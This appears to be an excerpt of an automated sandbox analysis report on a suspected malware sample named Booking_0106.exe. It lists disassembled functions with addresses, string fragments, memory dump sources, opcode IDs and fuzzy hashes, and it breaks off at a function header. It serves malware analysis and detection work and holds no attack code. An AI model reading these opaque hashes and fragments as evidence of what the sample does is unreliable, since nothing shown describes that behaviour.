API String ID: 0-2586804783
Opcode ID: bf63d42772b6baf76c0a33edd3fe7b19fd39d2322d5b0e22d6c0014cf03b02b0
Instruction ID: 04ccbe9526bfdba266a985062eb96d982c42ed245ebcadac3cf6a3ece1feaf85
Opcode Fuzzy Hash: bf63d42772b6baf76c0a33edd3fe7b19fd39d2322d5b0e22d6c0014cf03b02b0
Instruction Fuzzy Hash: 27E16C75E012298BDB14DF7AD884AADB7F2BFC8304F118669D40AEB354DB309946CF91

Function 00A110BA Relevance: 2.9, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

\s^q, xrefs: 00A11327
LR^q, xrefs: 00A11156

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: 7800c3324255c589ac777bbf0306a9849b2ecd2eb6c1ef9ab661ab3160eb9683
Instruction ID: 9fde2bed533261c2da1f085d2558d83fcab10cf2f0fbfe636312265a43952e91
Opcode Fuzzy Hash: 7800c3324255c589ac777bbf0306a9849b2ecd2eb6c1ef9ab661ab3160eb9683
Instruction Fuzzy Hash: 39D15A35E012298FDB14DF7AD884AADB7F2BFC8304F118569D40AEB354DB30A946CB91

Function 00A11131 Relevance: 2.8, Strings: 2, Instructions: 324COMMON

Download Yara Rule

Strings

\s^q, xrefs: 00A11327
LR^q, xrefs: 00A11156

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: 66e49c5501031a6ecf779516346702422d177f743de957e3758aa8c78ba81e0e
Instruction ID: daafd9ee8fab8f0f6db02d93d00cfb7193c8c32d5c5884f09789e3bb64abbaa3
Opcode Fuzzy Hash: 66e49c5501031a6ecf779516346702422d177f743de957e3758aa8c78ba81e0e
Instruction Fuzzy Hash: 84D15D35E016298FDB14DF7AD884AADB7F2BFC8304F118569D40AEB354DB30A9468F91

Function 00A10DA8 Relevance: 2.7, Strings: 2, Instructions: 211COMMON

Download Yara Rule

Strings

}J, xrefs: 00A10DC2
\s^q, xrefs: 00A10F1B

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID: }J$\s^q
API String ID: 0-1872654082
Opcode ID: 6e9ed1ba8d90672077d9c99bd548345aeaf6e071516d61192cfab310deb4837a
Instruction ID: 74d0d5105f83ddc45e2b519df3f1c1ab65a4eef2e4904bbaa4d2d31aa6034456
Opcode Fuzzy Hash: 6e9ed1ba8d90672077d9c99bd548345aeaf6e071516d61192cfab310deb4837a
Instruction Fuzzy Hash: D1810978E4010E9FDF14DFAAD984AEEBBB1FF88304F10A655D416EB294DB319941CB50

Function 00A122C0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0408704aec9a92ca44df730ef6e6822ec3992bb04b3c262ecca355a2cdd0883
Instruction ID: a73ecbf43ee6539d2fa351d243119ea057c965b32710646ad3e11cad14500539
Opcode Fuzzy Hash: d0408704aec9a92ca44df730ef6e6822ec3992bb04b3c262ecca355a2cdd0883
Instruction Fuzzy Hash: 6D918E32F105159FCB14DB69D884B9EB7E3AFC8710F1A8169E40ADB369DE34EC418B91

Function 00A10CD5 Relevance: 3.9, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

}J, xrefs: 00A10DC2
\s^q, xrefs: 00A10F1B
XPrq, xrefs: 00A10CDC

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID: }J$XPrq$\s^q
API String ID: 0-139466828
Opcode ID: 1993320b15df42803e3a0813263d76897a2f5629ec6a5a9bf74439ee4261bfbe
Instruction ID: d9e4165e421092ba56d94e7b0ab4bc39aba78b35644b7b8a0e266fe6d2c12595
Opcode Fuzzy Hash: 1993320b15df42803e3a0813263d76897a2f5629ec6a5a9bf74439ee4261bfbe
Instruction Fuzzy Hash: 0751F778E4020E8FDF14DFA9D984AEEB7B1FF88300F10A659D416EB254DB3199858B50

Function 00A10BFD Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

}J, xrefs: 00A10DC2
\s^q, xrefs: 00A10F1B

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID: }J$\s^q
API String ID: 0-1872654082
Opcode ID: 50fd4e733ede435192f3b7c5485897ff07c19aaa881c2c04347d5f2bc752f9a7
Instruction ID: 7fb1c0e62eb2830e3ad92379e57dd6ff69b461e3d869a43ed86d5344d2849b37
Opcode Fuzzy Hash: 50fd4e733ede435192f3b7c5485897ff07c19aaa881c2c04347d5f2bc752f9a7
Instruction Fuzzy Hash: 6F616C78D0420ECFDF01DFA9D984AEDBBB1FF89310F10A655D012EB2A5DB3199858B50

Function 00A10CFD Relevance: 2.7, Strings: 2, Instructions: 170COMMON

Download Yara Rule

Strings

\s^q, xrefs: 00A10F1B
}J, xrefs: 00A10E6D

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID: }J$\s^q
API String ID: 0-1872654082
Opcode ID: 3d6ee8e5967d209da3dc24af643d9b243c0850edc352901e5fe69d1d35ec32d3
Instruction ID: 56fb371d8c490a73ccee5c0218a44333e2897f70e56f4a6b6cc4b0d2081c21c6
Opcode Fuzzy Hash: 3d6ee8e5967d209da3dc24af643d9b243c0850edc352901e5fe69d1d35ec32d3
Instruction Fuzzy Hash: BA518C78E0420E8FDF01DFA9D944AEDBBB1FF89300F10A559D006EB255DB319982CB60

Function 00A10D25 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

}J, xrefs: 00A10DC2
\s^q, xrefs: 00A10F1B

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID: }J$\s^q
API String ID: 0-1872654082
Opcode ID: 0945f0a0c99cdf40e093c8abe0df58fc28c776344e4dca258c3450ce6dc6d352
Instruction ID: 54057559b300ba9dc8386370039edd63acfd8e2e5e2ae69b7c78b71b56cb93e6
Opcode Fuzzy Hash: 0945f0a0c99cdf40e093c8abe0df58fc28c776344e4dca258c3450ce6dc6d352
Instruction Fuzzy Hash: 4B510978E4020E9FDF10DFA9D940AEDBBB1FF89300F10A665D402EB295DB359945CB51

Function 00A10D98 Relevance: 2.6, Strings: 2, Instructions: 146COMMON

Download Yara Rule

Strings

}J, xrefs: 00A10DC2
\s^q, xrefs: 00A10F1B

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID: }J$\s^q
API String ID: 0-1872654082
Opcode ID: f8d40fac022109fd8a2f151d60f7271e449202fa718338a0ef7842eda2cb3fdb
Instruction ID: f8f8e8ac28152da160ee34d44706f52cca9198254c89053a418f7da4169e3966
Opcode Fuzzy Hash: f8d40fac022109fd8a2f151d60f7271e449202fa718338a0ef7842eda2cb3fdb
Instruction Fuzzy Hash: F3510878E4020E9FDF10DFA9D944AEEBBB1FF88300F10A659D416EB254DB319941CB51

Function 00A12090 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

, xrefs: 00A121A2

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 57622ca9f8d2665e8edc235b3a95b7c5372184e347c3b50cb2dec885e165728e
Instruction ID: 384679c0e352573d30a480f99b70a52f9ba218c8127ed3c7de84bee00273cfc9
Opcode Fuzzy Hash: 57622ca9f8d2665e8edc235b3a95b7c5372184e347c3b50cb2dec885e165728e
Instruction Fuzzy Hash: F2418831F0011A9BCB04DF99D880AAEBBB2FB84311B54C62AD615DB744D730E9A18B91

Function 00A12209 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

\s^q, xrefs: 00A1226F

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID: \s^q
API String ID: 0-4111632511
Opcode ID: 2394706dffbfa3d7d008f1fadf094a20d08dddafc7a339ff2151f0f5f20a6b1b
Instruction ID: f8ba440e15d00f6c8f935786c45ab9877e3ec66afbac39e4d90cd6895e2280a0
Opcode Fuzzy Hash: 2394706dffbfa3d7d008f1fadf094a20d08dddafc7a339ff2151f0f5f20a6b1b
Instruction Fuzzy Hash: 022190323404208FCB54DBBDE854EAE77E9EFC9B5071185AAE40ECB771EA21DC918790

Function 00A10797 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cbefd8b6230ebf472a0a1bf490cca538ae4f5412bb6763e57e4da26447d4680
Instruction ID: 79953a681cd534ac2f1890f8f054901d1b9f91e939b48edee1eb7053eb2f48a9
Opcode Fuzzy Hash: 8cbefd8b6230ebf472a0a1bf490cca538ae4f5412bb6763e57e4da26447d4680
Instruction Fuzzy Hash: 9351D621A0E3C55FD7026B7884245DD7FB2AF87705B1904DBC081DF2A3EE658C8AC7A6

Function 00A13A1A Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb83fa2fc19dc7fc92007e9e39211c02d0e804432b48fadff59b921926bc2d0
Instruction ID: b284c61fef862267c3ae95d5e8ba785321ac6596556588cf60cf3fdb6c883ead
Opcode Fuzzy Hash: 8bb83fa2fc19dc7fc92007e9e39211c02d0e804432b48fadff59b921926bc2d0
Instruction Fuzzy Hash: 52414B71D0825C9FCB14CFA9C494ADEBFF1AF49310F14846AE448AB260DB749D45CFA1

Function 00A12BF0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f96aef3b0b530e65b403f6516606731ac9fdcfca5748fb8856510acfbdcb401
Instruction ID: 0d357a6746f24209aed4e32909bb53a5407a5a1ad4be772042159cf57c9c036c
Opcode Fuzzy Hash: 1f96aef3b0b530e65b403f6516606731ac9fdcfca5748fb8856510acfbdcb401
Instruction Fuzzy Hash: 69314170A05B058FD734DF6AD8447AAB7F1FF84320B20862DD46AD7AA0D730E995CB90

Function 00A13A90 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d2579dbb2479574b109e4ee198841093eea457187d448d3fa5cd7e327fa98c1
Instruction ID: a962a11323468fde4e096ac8edd09f7591e81f3260ca070cad099e9e78461d56
Opcode Fuzzy Hash: 4d2579dbb2479574b109e4ee198841093eea457187d448d3fa5cd7e327fa98c1
Instruction Fuzzy Hash: FC3137B1D0425C9FCF14CFAAC584ADEBFF5AF48310F248429E409AB250DB749985CF94

Function 00A10859 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03821763298129ef0453383cf1e5e4e65cf7100979c5f7dbb4c820b4d25749f1
Instruction ID: 6e292ce1094caee3cba66eb0a897b6592765a0740b9544da0eae6c9cf754ca57
Opcode Fuzzy Hash: 03821763298129ef0453383cf1e5e4e65cf7100979c5f7dbb4c820b4d25749f1
Instruction Fuzzy Hash: E821A231B015458FDB05A7B880246AD7BF2AFCA704F54492DD046EB381DF758D868792

Function 00A10868 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 787125844d539a4ddecb9431c130c9c66982fedf3710e056fda22ffeaf841933
Instruction ID: 763fe937a2af0e57767986549512bcf726fe2f31af892544dd58cf181142c8b3
Opcode Fuzzy Hash: 787125844d539a4ddecb9431c130c9c66982fedf3710e056fda22ffeaf841933
Instruction Fuzzy Hash: 3021C1317011458FCB04BBB8C0286AE7BF2ABCA704F544929D006EB385EFB58D8587A3

Function 008DD4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270386968.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8dd000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e2ff1db05a955bfec41c1bab9d391618addd97f9f5f23010ec8d81a3b474bf
Instruction ID: 02866480d71de121713b92772a8d24889de9f1b84b31f3182ea4b0401b84c03a
Opcode Fuzzy Hash: c2e2ff1db05a955bfec41c1bab9d391618addd97f9f5f23010ec8d81a3b474bf
Instruction Fuzzy Hash: BB210371544304DFDB05DF14E9C0B2ABF76FB98318F20C26AE9098A356C336D856CBA2

Function 008DD49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270386968.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8dd000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 9792579bc900f9a718581b153bcf0565bec4478cf410a83656e26eec366b2747
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 3F11B176504340DFDB16CF14D9C4B16BF71FB94324F24C6AAD9094B256C336D85ACBA2

Function 008DD76D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270386968.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8dd000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5947c02baefaae55aece1cf0853efe23a96aa23ad4b12b68909ede80c16bc95e
Instruction ID: 7127175067b2f94ea09f03e106ef4ca2d2cbc94573a0f96f0d2a2d3fce66742e
Opcode Fuzzy Hash: 5947c02baefaae55aece1cf0853efe23a96aa23ad4b12b68909ede80c16bc95e
Instruction Fuzzy Hash: 9301A2710083489AE7108A29DD84B77BFD8FF51364F18C6ABED098A386C6799C40C671

Function 008DD76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270386968.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8dd000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95966161ce6ab1d0bd47eaecb0f38e316617a8bfd6576d19fe80024a7bd4b6b5
Instruction ID: 8653fe440b400668c16d7e6006c689ba8d640e3d0b707161b960f3e3c617d45b
Opcode Fuzzy Hash: 95966161ce6ab1d0bd47eaecb0f38e316617a8bfd6576d19fe80024a7bd4b6b5
Instruction Fuzzy Hash: E1F062714083449EE7108A1ADD84B62FFA8FF51724F18C59AED485A686C2799C45CA71

Function 00A11021 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bd24ac7abf301e9b557c3803b83a3ea322579ab519c0665fec516ec3fd7a697
Instruction ID: 3709f44540721511d68e1f0884bc0d085125633ed1a401cd2aed88c489d9836c
Opcode Fuzzy Hash: 0bd24ac7abf301e9b557c3803b83a3ea322579ab519c0665fec516ec3fd7a697
Instruction Fuzzy Hash: 67F0E532A041149FC714DBB8E490BEABFE8EF48369F10406ED00DC3684D6329852CB40

Function 00A12010 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae04dfdb0b37376d3c4b50be41b04d1901b6a32b011eda4ee7382052ed8bb868
Instruction ID: bdc04aa674a5170f9dd7ba7caa47bca86bfb98d02a1c6a601a17659d10c58f3d
Opcode Fuzzy Hash: ae04dfdb0b37376d3c4b50be41b04d1901b6a32b011eda4ee7382052ed8bb868
Instruction Fuzzy Hash: 76E06D70909288EFC701EBA8E80019DBBA5EB86304F1004EAD044D7362EA311E008762

Function 00A12020 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f437d4d49aeefcdfb5400701d88985a3f437b76429b0eefc5521d054cd51140
Instruction ID: f32cc343d1deadec3221e8305beba0af60b8740805664310fe11da4088108598
Opcode Fuzzy Hash: 5f437d4d49aeefcdfb5400701d88985a3f437b76429b0eefc5521d054cd51140
Instruction Fuzzy Hash: D2D05E30A0520CEFCB00EFA8E94159DBBB9FB85304B2041B9D508D7354EA316F049BA6

Function 00A12060 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e595dc95541ed2ed459057b776b3acb329e19302e70e9a28ed262f6c3abfada
Instruction ID: 1a2f28daf1f2f7e62efc43f37e02f8ad5475d4bb0f29f6fab12c81e9a684ca43
Opcode Fuzzy Hash: 6e595dc95541ed2ed459057b776b3acb329e19302e70e9a28ed262f6c3abfada
Instruction Fuzzy Hash: 6AC01292E8C2C09FEB024B254C55B803F20AB23711F0A40C2D2888F0F3E6A90502CB26

Function 00A121F0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2270989072.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a10000_doc-d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e581761c243c40129c912d82b87e053fb640bd22ea86d212a66a0d7737c16d5
Instruction ID: a941ddce2be4cdae5ad7fdbbc2ea625cfec7d00d4c9ca74810b78069d214a058
Opcode Fuzzy Hash: 6e581761c243c40129c912d82b87e053fb640bd22ea86d212a66a0d7737c16d5
Instruction Fuzzy Hash: 1EB092313542484AEA6097F578487AA328C9760658F400071B80CC5900F956F8B01288

Analysis Process: Booking_0106.exePID: 7628, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	179
Total number of Limit Nodes:	18

Executed Functions

Function 06BD3100 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06BD380B
$^q, xrefs: 06BD37FF
$^q, xrefs: 06BD3858
$^q, xrefs: 06BD3834
$^q, xrefs: 06BD384C
$^q, xrefs: 06BD3828

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 810ddbe116c72ce6a21174f2465442f43441486e2763dd09012616664e72deca
Instruction ID: 19552a274f09a1c26f0d6634b4a4deb547de3aba759beb81dc0a804667fa4ab6
Opcode Fuzzy Hash: 810ddbe116c72ce6a21174f2465442f43441486e2763dd09012616664e72deca
Instruction Fuzzy Hash: AC322E31E1061ACFCB14EF75C89459DB7B2FF89300F10C6A9D44AAB265EB70A985CF91

Function 06BD7DF0 Relevance: 3.0, Strings: 2, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06BD8397
$^q, xrefs: 06BD838B

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: eecdf3f4eb639f52dc3bbd4571385f6bb06d8177ce04708a67d2136ab060b89c
Instruction ID: 9b5bcf691d434b4ec957e7bd660f3056b820137a8acb06c43babc3534527c54b
Opcode Fuzzy Hash: eecdf3f4eb639f52dc3bbd4571385f6bb06d8177ce04708a67d2136ab060b89c
Instruction Fuzzy Hash: 46029E70B002058FDB54DF79E490AAEB7A2EF84315F1485A9D40ADF394EB35EC86CB91

Function 06BD240A Relevance: 1.0, Instructions: 1010COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 734a9b4a860e49ba06c43aba0ec78f76a8c0c076acb6d83f72cba413109b22ea
Instruction ID: 10e9a7a53acc5a808abf9d5e61c7df7ea885d158615600dd4f8e8727480b8007
Opcode Fuzzy Hash: 734a9b4a860e49ba06c43aba0ec78f76a8c0c076acb6d83f72cba413109b22ea
Instruction Fuzzy Hash: BE927574E002048FDBA4CF68C584A5DB7F2EB85314F5494A9D54AAF3A1EB35ED82CF81

Function 06BD6668 Relevance: .8, Instructions: 815COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ece51190861bebc93469c25d9c1ede1b957071e62dd4594e41aa9406227aa44c
Instruction ID: c6353b0aa72c538d3ecda258888f8dd91c7aba7803e39dee146d47e40229948f
Opcode Fuzzy Hash: ece51190861bebc93469c25d9c1ede1b957071e62dd4594e41aa9406227aa44c
Instruction Fuzzy Hash: D5628E74A002059FDB54DB68D554AADB7F2EF88314F1484A9E40AEF390FB35EC86CB91

Function 06BDC200 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03547e38681217d5ac2f3b1a5ed4c4adbd9c679e9f08a4196264d886aad5a3d6
Instruction ID: 588568331cb0880e5391e97e9a5d28348729922ebda64b24a32ef4de6ff5c212
Opcode Fuzzy Hash: 03547e38681217d5ac2f3b1a5ed4c4adbd9c679e9f08a4196264d886aad5a3d6
Instruction Fuzzy Hash: 1532A174B002058FDF54DFA8E980BAEBBB6EB88314F109565D505EB391EB35DC82CB91

Function 06BD5640 Relevance: .6, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8630dda6a3b971dc3857451f3812322f5df09685a3b1e805a4871efd2a236d
Instruction ID: fac49ad5e6d3bcf1942214682d1f24b57bee4512a6bf2579c77c87358c24e909
Opcode Fuzzy Hash: fc8630dda6a3b971dc3857451f3812322f5df09685a3b1e805a4871efd2a236d
Instruction Fuzzy Hash: 7212F4B2F002059BDB74DB64D8847AEB7B2EB85310F2484A9D85ADF385EA34DC45CB91

Function 06BDB2A2 Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17f7f5d37ddeecfc2f000316854823490ef8a0e799f10791db67fc97787da83a
Instruction ID: 9f0a4c6880ba6bd7906ce1f41cb82c33e41ba7ba825ef38e628b115208d88997
Opcode Fuzzy Hash: 17f7f5d37ddeecfc2f000316854823490ef8a0e799f10791db67fc97787da83a
Instruction Fuzzy Hash: 922271F0E002099FDF64CB68D590BADB7B2EB49310F219965E419EB391EB35DC81CB91

Function 06BDB6C8 Relevance: 8.0, Strings: 6, Instructions: 469COMMON

Download Yara Rule

Strings

$^q, xrefs: 06BDBBF3
$^q, xrefs: 06BDBC67
$^q, xrefs: 06BDBBFF
$^q, xrefs: 06BDBC27
$^q, xrefs: 06BDBC33
$^q, xrefs: 06BDBC5B

Memory Dump Source

Source File: 00000002.00000002.2989701329.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6bd0000_Booking_0106.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 7db17b8dcffe8791a788d3d7691284689cf0af7fb248af11d36882f9a5268f0a
Instruction ID: 5aad023b5b78e0ae0048691fb000ddd54a1ac84b3b8c9ecd8fde5c3a66e00246
Opcode Fuzzy Hash: 7db17b8dcffe8791a788d3d7691284689cf0af7fb248af11d36882f9a5268f0a
Instruction Fuzzy Hash: EE027DB0E0020A8FDBA4CF68D580AADB7B2FB45710F2595AAD015DF351EB35DC85CB91

Function 06BD91C0 Relevance: 5.2, Strings: 4, Instructions: 231
COMMON

Download Yara Rule

